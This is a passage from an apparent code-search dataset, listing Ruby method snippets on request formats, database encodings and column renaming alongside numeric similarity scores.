"def set_default_format\n if request.format.symbol.nil? || request.format.to_s == '*/*'\n logger.debug \"[ApplicationController] Request format set to #{request.format.to_s.inspect}, forcing 'text/plain'\"\n request.format = :text\n end\n end",
"def reset_format!\n self.format = @default_format\n end",
"def format\n @format ||= {}\n end",
"def default_format_json\n if(request.headers['HTTP_ACCEPT'].nil? && params[:format].nil?) ||\n (request.headers['HTTP_ACCEPT'] != 'application/xml' && params[:format] != 'xml')\n request.format = 'json'\n end\n end",
"def set_default_format_json\n if params[:format] && params[:format] != 'json'\n head :bad_request\n else\n request.format = 'json' unless params[:format]\n end\n end",
"def odb_format(frmt)\n \"#{to_s}.format(#{quote(frmt)})\"\n end",
"def prepare_column_options(column)\n super.tap do |spec|\n spec[:encoding] = \"'#{column.sql_type_metadata.encoding}'\" if column.sql_type_metadata.encoding.present?\n end\n end",
"def _process_format(format) # :nodoc:\n end",
"def check_acceptable_format\n if [\"txt\", \"png\"].include?(params[:format])\n params[:format] = nil\n raise ActiveRecord::RecordNotFound.new\n end\n end",
"def formats=(values); end",
"def schema_column_type(db_type)\n case db_type\n when /\\Ainterval\\z/io\n :interval\n when /\\Acitext\\z/io\n :string\n else\n super\n end\n end",
"def preferred_file_format\n ''\n end",
"def encoding\n select_value(\n \"SELECT pg_encoding_to_char(pg_database.encoding)\" <<\n \" FROM pg_database\" <<\n \" WHERE pg_database.datname LIKE '#{current_database}'\",\n 'SCHEMA')\n end",
"def index_formats(format)\n end",
"def format\n lookup_val = Integer(@rf['format'])\n @_format ||= format_proxy.lookup_format_name(lookup_val)\n rescue\n @rf['format']\n end",
"def format(format_name)\n valid_for 'string'\n assert_string format_name\n set format: format_name\n end",
"def check_acceptable_format\n raise ActiveRecord::RecordNotFound if [\"txt\", \"png\"].include?(params[:format] )\n end",
"def only_correct_postgres_version\n %w(8.4 9.0 9.1 9.2 9.3 9.4 9.5 9.6).each do |version|\n if version != postgresql_version.to_s # need to_s, because YAML may think it's a float\n package \"postgresql-#{version}\", :ensure => :absent\n package \"postgresql-contrib-#{version}\", :ensure => :absent\n end\n end\n end",
"def format; end",
"def format; end",
"def format; end",
"def format; end",
"def format; end",
"def format; end",
"def format; end",
"def format; end",
"def formats\n format\n end",
"def datetime_format\n @default_formatter.datetime_format\n end",
"def set_default_response_format\n request.format = :json unless params[:format]\n end",
"def load_format(format)\n case format.to_s\n when /(md|mkdn?|mdown|markdown)$/i\n :markdown\n when /(textile)$/i\n :textile\n when /(rdoc)$/i\n :rdoc\n when /(org)$/i\n :org\n when /(creole)$/i\n :creole\n when /(re?st(\\.txt)?)$/i\n :rest\n when /(asciidoc)$/i\n :asciidoc\n when /(pod)$/i\n :pod\n when /(\\d)$/i\n :roff\n when /(media)?wiki$/i\n :mediawiki\n else\n nil\n end\n end",
"def default_timestamp_format\n \"{ts '%Y-%m-%d %H:%M:%S%N'}\"\n end",
"def type_to_sql(type, limit = nil, precision = nil, scale = nil)\n if type == :decimal\n # Force an explicit scale if none supplied to specify the fixed\n # point form of Virtuoso's DECIMAL type. If no scale is specified,\n # the Virtuoso DECIMAL type stores floating point values.\n precision ||= 32\n scale ||= 0\n end\n super(type, limit, precision, scale)\n end",
"def format(name=nil)\n @format = name.to_s if name\n @format || DEFAULT_FORMAT\n end",
"def format\n raise '#format must be implemented in child class'\n end",
"def datetime_format=(datetime_format)\n @default_formatter.datetime_format = datetime_format\n end",
"def format\n @data.format == :base ? :file : @data.format\n end",
"def to_postgres_string\n min_string = minutes.to_s\n sec_string = seconds.to_s\n \n min_string = \"0\" + min_string if minutes.to_s.length < 2\n sec_string = \"0\" + sec_string if seconds.to_s.length < 2\n \n return hours.to_s+\":\"+min_string+\":\"+sec_string\n end",
"def is_format?(); @type == GRT_FORMAT; end",
"def use_column_schema_to_ruby_default_fallback?\n database_type != :mysql\n end",
"def use_column_schema_to_ruby_default_fallback?\n database_type != :mysql\n end",
"def firebird_cast_default\n sql = \"SELECT CAST(#{@default} AS #{column_def}) FROM RDB$DATABASE\"\n if connection = Base.active_connections.values.detect { |conn| conn && conn.adapter_name == 'Firebird' }\n connection.execute(sql).to_a.first['CAST']\n else\n raise ConnectionNotEstablished, \"No Firebird connections established.\"\n end\n end",
"def format=(format)\n use_format(format)\n end",
"def psql_db_dump_replacer__for_psql_db__sample_example\n [\n psql_db__sample_example,\n [\n \"/tmp/psql_db_original_dump\"\n ],\n [\n \"/tmp/database_dump\"\n ],\n \"ON_ERROR_STOP=off\",\n ]\n end",
"def datetime_format\n end",
"def connection_configuration_sqls\n sqls = super\n sqls << \"SET DateStyle = 'ISO'\" if @use_iso_date_format\n sqls\n end",
"def default_key_format(key)\n key\n end",
"def set_wiki_format_for_preview\n @text.wiki_format = params[:pwfmt_format] if @text && params[:pwfmt_format]\n end",
"def set_wiki_format_for_preview\n @text.wiki_format = params[:pwfmt_format] if @text && params[:pwfmt_format]\n end",
"def create_format_method\n end",
"def set_default_format\n request.format = 'json'\n end",
"def set_default_format\n request.format = 'json'\n end",
"def convert_format(value, definition)\n value || 'html'\n end",
"def typus_date_format(attribute = 'default')\n date_format = Typus::Configuration.config[self.name]['fields']['options']['date_formats'][attribute] rescue nil\n date_format = :db if date_format.nil?\n return date_format.to_sym\n end",
"def cast_default(value)\n @format_string = iso8601\n cast_fmt(value)\n end",
"def format=(_arg0); end",
"def format=(_arg0); end",
"def format=(_arg0); end",
"def format=(_arg0); end",
"def default_format_to_atom\n # Default the type we are sending out\n if request.accept.nil?\n request.format = :atom\n end\n end",
"def default_format_to_atom\n # Default the type we are sending out\n if request.accept.nil?\n request.format = :atom\n end\n end",
"def record_format\n @record_format ||= make_record_description if record_describer\n end",
"def format\n @format ||= properties.format.new self\n end",
"def format= new_format\n @grpc.type = :PLAIN_TEXT if new_format.to_s == \"text\"\n @grpc.type = :HTML if new_format.to_s == \"html\"\n @grpc.type\n end",
"def default_formatter\n Sapience::Formatters::Default.new\n end",
"def datetime_format\n @default_formatter.datetime_format\n end",
"def guess_date_format\n begin\n line = @data.gets\n break if line.nil?\n\n date = line[1..-1]\n guessed_format = Qif::DateFormat::SUPPORTED_DATEFORMAT.find { |format_string, format|\n test_date_with_format?(date, format_string, format)\n }\n end until guessed_format\n\n @data.rewind\n\n guessed_format ? guessed_format.first : @fallback_format\n end",
"def format=(procedure); end",
"def preformatting\n\n end"
] |
[
"0.62009215",
"0.5986719",
"0.5925541",
"0.5899727",
"0.58987576",
"0.58987576",
"0.5891657",
"0.58241314",
"0.57326424",
"0.5712006",
"0.5712006",
"0.5691154",
"0.5628859",
"0.5605188",
"0.5576969",
"0.5564784",
"0.55390805",
"0.5512747",
"0.55099905",
"0.55004245",
"0.54813516",
"0.54565156",
"0.54542017",
"0.54407746",
"0.54129773",
"0.53869724",
"0.5385871",
"0.5377548",
"0.53703064",
"0.5335459",
"0.53244156",
"0.53153217",
"0.53018886",
"0.52643555",
"0.523289",
"0.52239436",
"0.5221858",
"0.5220793",
"0.5219631",
"0.5205655",
"0.5184887",
"0.51814324",
"0.5176165",
"0.51726055",
"0.51680243",
"0.5160576",
"0.51540303",
"0.51535314",
"0.5149291",
"0.51313406",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.5126848",
"0.51154757",
"0.5113992",
"0.5104564",
"0.51034623",
"0.509926",
"0.5097371",
"0.50870836",
"0.50826484",
"0.5076271",
"0.50744104",
"0.506893",
"0.5065279",
"0.50572985",
"0.50572985",
"0.5055672",
"0.5032734",
"0.5031876",
"0.502883",
"0.5027",
"0.5013925",
"0.5011036",
"0.5011036",
"0.50103974",
"0.4993597",
"0.49934736",
"0.49911702",
"0.49790943",
"0.49772224",
"0.49675253",
"0.49675253",
"0.49675253",
"0.49675253",
"0.4964867",
"0.4964867",
"0.49639493",
"0.49629107",
"0.49480483",
"0.49439335",
"0.49393898",
"0.4938375",
"0.49342814",
"0.49305558"
] |
0.5733273
|
8
|
If the :prepare option is given and we aren't in a savepoint, prepare the transaction for a two-phase commit.
|
def commit_transaction(conn, opts=OPTS)
if (s = opts[:prepare]) && savepoint_level(conn) <= 1
log_connection_execute(conn, "PREPARE TRANSACTION #{literal(s)}")
else
super
end
end
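A hedged sketch of the two-phase flow this enables; the transaction id and table are assumed, and the second phase relies on the adapter's commit_prepared_transaction/rollback_prepared_transaction helpers:

DB.transaction(prepare: 'txn-1234') do
  DB[:accounts].where(id: 1).update(balance: Sequel[:balance] - 100)
end
# The work is now PREPAREd rather than committed; a coordinator resolves it later:
DB.commit_prepared_transaction('txn-1234')      # or: DB.rollback_prepared_transaction('txn-1234')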
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def on_prepare_transaction_commit(unit, transaction); end",
"def commit_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n if supports_releasing_savepoints?\n log_connection_yield('Transaction.release_savepoint', conn){conn.release_savepoint(savepoint_obj(conn))}\n end\n else\n log_connection_yield('Transaction.commit', conn){conn.commit}\n end\n end",
"def on_prepare_commit(unit, aggregates, events); end",
"def prepare_save!\n run_callbacks(:save) { false }\n end",
"def begin_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n _trans(conn)[:savepoints][-1][:obj] = log_connection_yield('Transaction.savepoint', conn){conn.set_savepoint}\n else\n log_connection_yield('Transaction.begin', conn){conn.setAutoCommit(false)}\n set_transaction_isolation(conn, opts)\n end\n end",
"def initial_commit?; end",
"def initial_commit?; end",
"def commit( defer=false )\n save_logic( defer, false )\n end",
"def commit_required?; end",
"def supports_savepoints_in_prepared_transactions?\n supports_prepared_transactions? && supports_savepoints?\n end",
"def prepare(&block)\n @prepare = block\n end",
"def prepare!; end",
"def prepare!; end",
"def prepare(*)\n raise Error, \"cannot prepare an already prepared statement\" unless allow_preparing_prepared_statements?\n super\n end",
"def transaction(&block)\n yield\n commit\n end",
"def run(*args, &block)\n Sequel::Model.db.transaction(rollback: :always, auto_savepoint: true) { super }\n end",
"def commit!\n _commit( false )\n end",
"def prepare; end",
"def prepare; end",
"def prepare; end",
"def supports_prepared_transactions?\n false\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def commit_db_transaction\n execute(\"COMMIT\")\n end",
"def prepare\n @prepare ||= default_prepare\n end",
"def commit_transaction\n\t super\n\n\t arguments.dup.each do |key, value|\n if value.respond_to?(:transaction_proxy?) && value.transaction_proxy?\n\t\t arguments.update!(key, value.__getobj__)\n\t\tend\n\t end\n\tend",
"def commit_db_transaction() end",
"def commit_db_transaction() end",
"def commit; end",
"def commit; end",
"def commit; end",
"def prepare(&block)\n define_method(:prepare, &block)\n end",
"def prepare(options = {})\n raise \"prepare not implemented\"\n end",
"def prepare\n true\n end",
"def prepare\n true\n end",
"def test_transactions(table=\"test_monetdb_transactions\", columndefs=['col1 INT', 'col2 VARCHAR(255)'])\n test_create_table(table, columndefs)\n \n data = [1, 'aa'] \n values = \"\"\n \n data.each do |d| values += '\\'' + d.to_s + '\\'' + ',' end\n values = values.chop # remove last ',' character \n \n insert = \"INSERT INTO \" + table + \" VALUES \" + \" ( \" + values + \" )\"\n \n @db.query('START TRANSACTION')\n @db.auto_commit(flag=false) # if @db.auto_commit?\n @db.query(insert)\n\n @db.query(\"COMMIT\") \n \n res = @db.query('SELECT * FROM ' + table)\n rows_committed = res.fetch_all\n res.free\n \n # create a save point\n @db.save\n @db.query(\"SAVEPOINT #{@db.transactions} ;\")\n \n @db.query(insert)\n \n # rollback to savepoint\n @db.query(\"ROLLBACK TO SAVEPOINT #{@db.transactions};\")\n @db.release\n \n res = @db.query('SELECT * FROM ' + table)\n rows_rolled_back = res.fetch_all\n res.free\n \n assert_equal(rows_committed, rows_rolled_back)\n \n # restore autocommit for remaining tests\n @db.auto_commit(flag=true) \n end",
"def notify_prepare_commit\n raise NotImplementedError\n end",
"def prepare record = nil, command\n record ? Statement.new(record, command) : db.prepare(command)\n end",
"def camCommitPrepared _obj, _args\n \"_obj camCommitPrepared _args;\" \n end",
"def commit_transaction\n # The relation graph handling is a bit tricky. We resolve the graphs\n # exclusively using self (NOT other) because if 'other' was a new\n # task, it has been already moved to the new plan (and its relation\n # graph resolution is using the new plan's new graphs already)\n\n super\n\n if @executable != __getobj__.instance_variable_get(:@executable)\n __getobj__.executable = @executable\n end\n\n finalization_handlers.each do |handler|\n __getobj__.when_finalized(handler.as_options, &handler.block)\n end\n end",
"def commit=(_arg0); end",
"def commit=(_arg0); end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def with_optional_transaction(bool, &block)\n bool ? transaction { yield } : yield\n end",
"def commit!() raise NotImplementedError end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare\n end",
"def prepare()\n end",
"def after_commit(unit); end",
"def commit_if_dirty\n # no op\n end",
"def after_commit(*); end",
"def commiter() end",
"def allow_preparing_prepared_statements?\n false\n end",
"def prepare\n end",
"def commit()\n check_return_code(PureHailDB.ib_trx_commit(@trx_ptr))\n end",
"def commit()\n #This is a stub, used for indexing\n end",
"def transaction(&block)\n self['AutoCommit'] = false\n self.do_transaction(&block)\n self['AutoCommit'] = true\n end",
"def commit_transaction\n\t super\n\t \n\t # Update the task arguments. The original\n\t # Roby::Task#commit_transaction has already translated the proxy\n\t # objects into real objects\n\t arguments.each do |key, value|\n\t\t__getobj__.arguments.update!(key, value)\n\t end\n\n execute_handlers.each do |h|\n __getobj__.execute(h.as_options, &h.block)\n end\n poll_handlers.each do |h|\n __getobj__.poll(h.as_options, &h.block)\n end\n\n __getobj__.abstract = self.abstract?\n if @fullfilled_model\n __getobj__.fullfilled_model = @fullfilled_model.dup\n end\n __getobj__.do_not_reuse if !@reusable\n\tend",
"def TransactionBegin()\n\t@dbh.do(\"BEGIN\")\nend",
"def prepare!\n prepare_in_parallel!\n end",
"def commit_transaction(conn, opts={})\n log_yield(TRANSACTION_COMMIT){conn.commit}\n end",
"def transaction\n start\n yield self\n rescue Object => ex\n rollback\n debug \"#{ex.class}: #{ex.message}\"\n ex.backtrace.each { |line| debug line }\n else\n commit\n end",
"def prepare; self; end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def begin_db_transaction\n execute(\"BEGIN\")\n end",
"def prepare_invoke!\n @prepared = true\n end",
"def begin_db_transaction() end",
"def begin_db_transaction() end",
"def run_prepare_code\n @context = @prepare_code ? @prepare_code[] : nil\n @prepared = true\n @context\n end",
"def after_commit(&blk)\n ActiveRecord::Base.connection.add_transaction_record(\n AfterCommitWrapper.new(&blk)\n )\n end",
"def commit!\n save! unless persisted?\n end",
"def prepare\n end",
"def prepare\n end",
"def commit( transaction )\n fail NotImplementedError\n end",
"def within_transaction\n if use_transaction\n first.within_transaction do\n yield\n success?\n end\n else\n yield\n end\n end",
"def rollback_transaction(conn, opts=OPTS)\n if in_savepoint?(conn)\n log_connection_yield('Transaction.rollback_savepoint', conn){conn.rollback(savepoint_obj(conn))}\n else\n log_connection_yield('Transaction.rollback', conn){conn.rollback}\n end\n end",
"def transaction(&block); end",
"def transaction; end",
"def transaction; end",
"def transaction; end",
"def within_transaction; end",
"def within_transaction; end",
"def commit(on_kill = false)\n\n unless @destination.sql.empty?\n\n $log.debug(self) {'Launch last commit'} if on_kill\n\n if @use_cache\n cache_time = Time.now\n\n # And add to the cache\n @cache.commit\n\n Thread.current[:threshold_log].add 'Cache time', (Time.now - cache_time).round(3)\n end\n\n pg_time = Time.now\n # Launch SQL commands\n @destination.commit\n Thread.current[:threshold_log].add 'Replicate time', (Time.now - pg_time).round(3)\n\n end\n\n end",
"def remove_transaction(conn, committed)\n if jdbc_level = _trans(conn)[:original_jdbc_isolation_level]\n log_connection_yield(\"Transaction.restore_isolation_level\", conn){conn.setTransactionIsolation(jdbc_level)}\n end\n unless in_savepoint?(conn)\n conn.setAutoCommit(true)\n end\n ensure\n super\n end",
"def transaction\n start_transaction!\n\n result = yield\n\n query 'COMMIT'\n\n result\n rescue\n query 'ROLLBACK'\n raise\n\n ensure\n end_transaction!\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def checked_transaction(opts=OPTS)\n use_transaction?(opts) ? db.transaction({:server=>this_server}.merge!(opts)){yield} : yield\n end",
"def commit_transaction(tx)\n tx.execute\n end",
"def prepare\n # Only do this once\n return if $has_prepared\n\n prepared_statements = {\n temperature_readings: :insert_temp,\n moisture_readings: :insert_moisture,\n light_readings: :insert_light,\n }\n\n prepared_statements.each do |table, name|\n DB[table].prepare(:insert, name, plant_id: :$plant_id, value: :$value)\n end\n\n $has_prepared = true\nend",
"def commit\n # no op\n end",
"def transaction(&blk)\n tap(&blk)\n end",
"def commit_transaction(conn)\n log_connection_execute(conn, commit_transaction_sql) unless Thread.current[:sequel_transaction_depth] > 1\n end",
"def transaction(options={}, &block)\n connection.transaction(options.update(:requires_new => true), &block)\n end",
"def _save(opts)\n sh = {:server=>this_server}\n uacr = use_after_commit_rollback\n if uacr.nil? ? (method(:after_rollback).owner != InstanceMethods) : uacr\n Sequel::Deprecation.deprecate(\"Model#after_rollback\", \"Instead, call db.after_rollback in Model#before_save\")\n db.after_rollback(sh){after_rollback}\n end\n pk = nil\n called_save = false\n called_cu = false\n around_save do\n called_save = true\n if before_save == false\n Sequel::Deprecation.deprecate(\"Having before_save return false to cancel the save\", \"Instead, call cancel_action inside before_save\")\n raise_hook_failure(:before_save)\n end\n\n if new?\n around_create do\n called_cu = true\n if before_create == false\n Sequel::Deprecation.deprecate(\"Having before_create return false to cancel the create\", \"Instead, call cancel_action inside before_create\")\n raise_hook_failure(:before_create)\n end\n pk = _insert\n _after_create(pk) # SEQUEL5: Remove\n # SEQUEL5\n # @this = nil\n # @new = false\n # @modified = false\n # pk ? _save_refresh : changed_columns.clear\n after_create\n true\n end\n raise_hook_failure(:around_create) unless called_cu\n else\n around_update do\n called_cu = true\n if before_update == false\n Sequel::Deprecation.deprecate(\"Having before_update return false to cancel the update\", \"Instead, call cancel_action inside before_update\")\n raise_hook_failure(:before_update)\n end\n columns = opts[:columns]\n if columns.nil?\n columns_updated = if opts[:changed] # SEQUEL5: Use local variable instead of instance variable\n @values.reject{|k,v| !changed_columns.include?(k)}\n else\n _save_update_all_columns_hash\n end\n changed_columns.clear\n else # update only the specified columns\n columns = Array(columns)\n columns_updated = @values.reject{|k, v| !columns.include?(k)}\n changed_columns.reject!{|c| columns.include?(c)}\n end\n _update_columns(columns_updated)\n _after_update # SEQUEL5: Remove\n # SEQUEL5\n # @this = nil\n # @modified = false\n after_update\n true\n end\n raise_hook_failure(:around_update) unless called_cu\n end\n after_save\n true\n end\n raise_hook_failure(:around_save) unless called_save\n _after_save(pk) # SEQUEL5: Remove\n if uacr.nil? ? (method(:after_commit).owner != InstanceMethods) : uacr\n Sequel::Deprecation.deprecate(\"Model#after_commit\", \"Instead, call db.after_commit in Model#after_save\")\n db.after_commit(sh){after_commit}\n end\n self\n end",
"def test_commit_empty()\n t = Scalaroid::Transaction.new()\n t.commit()\n t.close_connection()\n end"
] |
[
"0.6718019",
"0.662396",
"0.6306131",
"0.6208742",
"0.61423445",
"0.6091793",
"0.6091793",
"0.6078697",
"0.6044119",
"0.59700394",
"0.5848423",
"0.58226323",
"0.58226323",
"0.57957965",
"0.5729422",
"0.56911594",
"0.56845605",
"0.56661",
"0.56661",
"0.56661",
"0.5664158",
"0.5662792",
"0.5662792",
"0.5662128",
"0.5651784",
"0.5620142",
"0.5620142",
"0.5613401",
"0.5613401",
"0.5613401",
"0.56055105",
"0.55733514",
"0.5538407",
"0.5538407",
"0.55249447",
"0.55184317",
"0.5510675",
"0.5510236",
"0.5509445",
"0.55055636",
"0.55055636",
"0.5497655",
"0.5497655",
"0.5495107",
"0.54837376",
"0.5479506",
"0.5479506",
"0.5479506",
"0.5479506",
"0.5479506",
"0.5479506",
"0.5479506",
"0.54523724",
"0.54512423",
"0.54432625",
"0.5440707",
"0.54289365",
"0.5428602",
"0.5418754",
"0.5408349",
"0.540452",
"0.5395334",
"0.539266",
"0.53787106",
"0.5356356",
"0.53543323",
"0.5327595",
"0.53190255",
"0.5318492",
"0.5318492",
"0.5312136",
"0.5307578",
"0.5307578",
"0.5295135",
"0.52950835",
"0.5292285",
"0.529208",
"0.529208",
"0.52706444",
"0.52701676",
"0.52679074",
"0.52626485",
"0.5261709",
"0.5261709",
"0.5261709",
"0.5258163",
"0.5258163",
"0.5252249",
"0.5239655",
"0.52353674",
"0.52330816",
"0.52330816",
"0.5230019",
"0.5226595",
"0.52258253",
"0.52145934",
"0.52067417",
"0.52060133",
"0.520013",
"0.51986897"
] |
0.71222514
|
0
|
PostgreSQL can't combine rename_column operations, but it can combine the custom validate_constraint operation.
|
def combinable_alter_table_op?(op)
(super || op[:op] == :validate_constraint) && op[:op] != :rename_column
end
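A sketch of the practical effect, assuming a Sequel PostgreSQL connection DB (validate_constraint here is the custom alter-table op the predicate whitelists):

DB.alter_table(:items) do
  add_column :qty, Integer            # combinable: folded into a single ALTER TABLE
  validate_constraint :qty_positive   # also combinable, via the :validate_constraint case above
  rename_column :name, :title         # not combinable: issued as its own ALTER TABLE statement
end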
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def undo_cleanup_concurrent_column_rename(table, old_column, new_column, type: nil, batch_column_name: :id)\n Gitlab::Database::QueryAnalyzers::RestrictAllowedSchemas.require_ddl_mode!\n\n setup_renamed_column(__callee__, table, new_column, old_column, type, batch_column_name)\n\n with_lock_retries do\n install_bidirectional_triggers(table, old_column, new_column)\n end\n end",
"def rename_column_concurrently(table, old_column, new_column, type: nil, batch_column_name: :id)\n Gitlab::Database::QueryAnalyzers::RestrictAllowedSchemas.require_ddl_mode!\n\n setup_renamed_column(__callee__, table, old_column, new_column, type, batch_column_name)\n\n with_lock_retries do\n install_bidirectional_triggers(table, old_column, new_column)\n end\n end",
"def supports_named_column_constraints?\n true\n end",
"def validate_constraint(name)\n @operations << {:op => :validate_constraint, :name => name}\n end",
"def rename?\n model.send(:\"rename_#{column}\")\n end",
"def rename_column(table_name, old_name, new_name)\n column_functional(table_name) do\n rename_table_column(old_name, new_name)\n end\n end",
"def cleanup_concurrent_column_rename(table, old_column, new_column)\n teardown_rename_mechanism(table, old_column, new_column, column_to_remove: old_column)\n end",
"def rename_rule(old_name, table, new_name)\n execute \"ALTER RULE #{quote_rule(old_name)} ON #{quote_table_name(table)} RENAME TO #{quote_rule(new_name)};\"\n end",
"def rename_column(old_col_name, new_col_name)\r\n raise \"Do not execute this method in client/server mode!\" if \\\r\n @db.client?\r\n\r\n raise \"Cannot rename recno column!\" if old_col_name == :recno\r\n raise \"Cannot give column name of recno!\" if new_col_name == :recno\r\n\r\n raise 'Invalid column name to rename: ' % old_col_name unless \\\r\n @field_names.include?(old_col_name)\r\n \r\n raise 'New column name already exists: ' % new_col_name if \\\r\n @field_names.include?(new_col_name)\r\n\r\n @db.engine.rename_column(self, old_col_name, new_col_name)\r\n\r\n # Need to reinitialize the table instance and associated indexes.\r\n @db.engine.remove_recno_index(@name)\r\n @db.engine.remove_indexes(@name)\r\n\r\n update_header_vars\r\n create_indexes\r\n create_table_class unless @db.server?\r\n end",
"def rename!(new_name, orig_name)\n new_name = new_name.to_underscore_sym\n orig_name = orig_name.to_underscore_sym\n raise ArgumentError, \"Column not found\" unless self.labels.include?(orig_name)\n raise ArgumentError, \"Cannot name #{orig_name} to #{new_name}, that column already exists.\" if self.labels.include?(new_name)\n i = self.labels.index(orig_name)\n self.labels[i] = new_name\n end",
"def test_add_rename\n add_column \"test_models\", \"girlfriend\", :string\n TestModel.reset_column_information\n\n TestModel.create girlfriend: \"bobette\"\n\n rename_column \"test_models\", \"girlfriend\", \"exgirlfriend\"\n\n TestModel.reset_column_information\n bob = TestModel.first\n\n assert_equal \"bobette\", bob.exgirlfriend\n end",
"def supports_external_drop_constraints?() false; end",
"def supports_external_drop_constraints?() true; end",
"def undo_rename_column_concurrently(table, old_column, new_column)\n teardown_rename_mechanism(table, old_column, new_column, column_to_remove: new_column)\n end",
"def check_column_conflicts\n mod = Sequel::Model\n columns.find_all{|c| mod.method_defined?(c)}.each{|c| get_column_conflict!(c)}\n columns.find_all{|c| mod.method_defined?(\"#{c}=\")}.each{|c| set_column_conflict!(c)}\n end",
"def test_rename_column\n add_column \"test_models\", \"first_name\", \"string\"\n\n TestModel.create first_name: \"foo\"\n\n rename_column \"test_models\", \"first_name\", \"nick_name\"\n TestModel.reset_column_information\n assert_includes TestModel.column_names, \"nick_name\"\n assert_equal [\"foo\"], TestModel.all.map(&:nick_name)\n end",
"def rename(renames)\n prepare_atomic_operation do |ops|\n process_atomic_operations(renames) do |old_field, new_field|\n new_name = new_field.to_s\n if executing_atomically?\n process_attribute new_name, attributes[old_field]\n process_attribute old_field, nil\n else\n attributes[new_name] = attributes.delete(old_field)\n end\n ops[atomic_attribute_name(old_field)] = atomic_attribute_name(new_name)\n end\n { \"$rename\" => ops }\n end\n end",
"def test_rename_column_using_symbol_arguments\n add_column :test_models, :first_name, :string\n\n TestModel.create first_name: \"foo\"\n\n rename_column :test_models, :first_name, :nick_name\n TestModel.reset_column_information\n assert_includes TestModel.column_names, \"nick_name\"\n assert_equal [\"foo\"], TestModel.all.map(&:nick_name)\n end",
"def remove_null_constraint_safely(table_name, column_name, name: nil)\n # could also ensure in transaction so it can be reversed\n # but that's more of a concern for a reversible migrations check\n ensure_postgresql(__method__)\n\n reversible do |dir|\n dir.up do\n name ||= null_constraint_name(table_name, column_name)\n\n safety_assured do\n execute quote_identifiers(\"ALTER TABLE %s DROP CONSTRAINT %s\", [table_name, name])\n end\n end\n\n dir.down do\n add_null_constraint_safely(table_name, column_name)\n end\n end\n end",
"def test_remove_index_when_name_and_wrong_column_name_specified\n index_name = \"accounts_idx\"\n\n @connection.add_index :accounts, :firm_id, name: index_name\n assert_raises ArgumentError do\n @connection.remove_index :accounts, name: index_name, column: :wrong_column_name\n end\n ensure\n @connection.remove_index(:accounts, name: index_name)\n end",
"def test_remove_index_when_name_and_wrong_column_name_specified\n index_name = \"accounts_idx\"\n\n @connection.add_index :accounts, :firm_id, name: index_name\n assert_raises ArgumentError do\n @connection.remove_index :accounts, name: index_name, column: :wrong_column_name\n end\n ensure\n @connection.remove_index(:accounts, name: index_name)\n end",
"def validate\n super\n rescue Sudoku::Constraint::ConstraintError => e\n raise ConstraintError, e.message + \" in a column\"\n end",
"def validate_constraint(table, name)\n current_instructions << Instructions::ValidateConstraint.new(\n table: table,\n name: name,\n )\n end",
"def alter_table_sql(table, op)\n case op[:op]\n when :rename_column\n unless sch = op[:schema]\n raise(Error, \"can't find existing schema entry for #{op[:name]}\") unless sch = op[:schema] || schema(table).find{|c| c.first == op[:name]}\n sch = sch.last\n end\n [\n alter_table_sql(table, :op=>:add_column, :name=>op[:new_name], :default=>sch[:ruby_default], :type=>sch[:db_type], :null=>sch[:allow_null]),\n from(table).update_sql(op[:new_name]=>op[:name]),\n alter_table_sql(table, :op=>:drop_column, :name=>op[:name])\n ]\n when :set_column_null, :set_column_default\n raise(Error, \"can't find existing schema entry for #{op[:name]}\") unless sch = op[:schema] || schema(table).find{|c| c.first == op[:name]}\n sch = sch.last\n\n sch = if op[:op] == :set_column_null\n sch.merge(:allow_null=>op[:null])\n else\n sch.merge(:ruby_default=>op[:default])\n end\n\n [\n alter_table_sql(table, :op=>:rename_column, :name=>op[:name], :new_name=>:sequel_access_backup_column, :schema=>sch),\n alter_table_sql(table, :op=>:rename_column, :new_name=>op[:name], :name=>:sequel_access_backup_column, :schema=>sch)\n ]\n else\n super\n end\n end",
"def test_remove_index_when_name_and_wrong_column_name_specified_positional_argument\n index_name = \"accounts_idx\"\n\n @connection.add_index :accounts, :firm_id, name: index_name\n assert_raises ArgumentError do\n @connection.remove_index :accounts, :wrong_column_name, name: index_name\n end\n ensure\n @connection.remove_index(:accounts, name: index_name)\n end",
"def rename_column(table, *args)\n alter_table(table) {rename_column(*args)}\n end",
"def rename_column(table, *args)\n alter_table(table) {rename_column(*args)}\n end",
"def check_constraints\n case self.recordable\n when ExtractionsExtractionFormsProjectsSectionsQuestionRowColumnField\n case self.recordable.question_row_column_field.question_row_column.question_row_column_type.name\n when 'text'\n min_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_length).to_i\n max_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_length).to_i\n if self.persisted? && self.name.length > 0 && (self.name.length < min_length || self.name.length > max_length)\n errors.add(:length, \"must be between #{ min_length.to_s } and #{ max_length.to_s }\")\n end\n when 'numeric'\n # First check that we aren't trying to validate any of the ~, <, >, ≤, ≥ special characters.\n if self.recordable.question_row_column_field.question_row_column.question_row_column_fields.second == self.recordable.question_row_column_field\n unless (self.name =~ /\\A[-+]?[0-9]*\\.?[0-9]+\\z/) || self.name != ''\n errors.add(:value, 'Must be numeric')\n end\n\n min_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_value).to_i\n max_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_value).to_i\n if self.persisted? && (self.name.to_i < min_value || self.name.to_i > max_value)\n errors.add(:value, \"must be numeric and between #{ min_value.to_s } and #{ max_value.to_s }\")\n end\n end\n end\n end\n end",
"def validate_table_column(table, column_name, allowed)\n validate_table(table)\n validate_name(column_name, allowed)\n end",
"def rename(new_name)\n raise 'to be implemented in subclass'\n end",
